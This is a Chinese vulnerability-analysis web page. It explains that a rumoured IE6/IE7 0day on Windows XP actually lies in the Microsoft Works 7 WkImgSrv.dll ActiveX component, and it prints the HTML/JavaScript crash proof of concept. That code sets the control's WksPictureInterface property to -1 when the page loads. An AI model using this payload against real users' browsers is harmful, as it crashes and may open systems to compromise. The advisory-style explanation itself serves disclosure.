手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >IE 0day漏洞 问题出自MS Works
IE 0day漏洞 问题出自MS Works
摘要:近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于I...

近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。

影响的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0) 以下为crash POC <html>

<head>

<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>

<script language=”JavaScript”>

function payload() {

var num = -1;

obj.WksPictureInterface = num;

}

</script>

</head>

<body onload=”JavaScript: return payload();”>

<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>

</object>

</body>

</html>

【IE 0day漏洞 问题出自MS Works】相关文章:

ewebeditor通杀鸡肋0day漏洞

eWebeditor漏洞的修补

Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞

分析phpwind2.0.1漏洞

ecshop爆绝对路径的bug

PunBB口令重置弱随机数绕过安全限制漏洞

Seagull PHP Framework optimizer.php的泄露漏洞

Microsoft Windows GDI文件名解析栈溢出漏洞(MS08-021)

Libpng库未知类型块处理远程代码执行漏洞

FTP客户端目录遍历漏洞可向任意位置写文件

精品推荐
分类导航